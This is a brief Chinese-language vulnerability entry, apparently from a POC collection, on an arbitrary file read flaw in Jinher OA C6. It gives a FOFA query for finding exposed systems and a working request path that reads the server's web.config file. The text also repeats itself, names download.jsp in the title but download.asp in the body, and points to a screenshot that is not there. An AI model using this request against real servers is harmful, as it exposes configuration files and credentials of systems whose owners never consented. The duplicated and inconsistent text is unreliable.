金和OA C6 download.jsp 任意文件读取漏洞
漏洞描述
金和OA C6 download.jsp文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感信息
漏洞影响
金和OA
FOFA
app="Jinher-OA"
POC
界面如下
漏洞产生文件为 download.asp
POC构造
/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config
金和OA C6 download.jsp文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感信息
金和OA
app="Jinher-OA"
界面如下
漏洞产生文件为 download.asp
/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config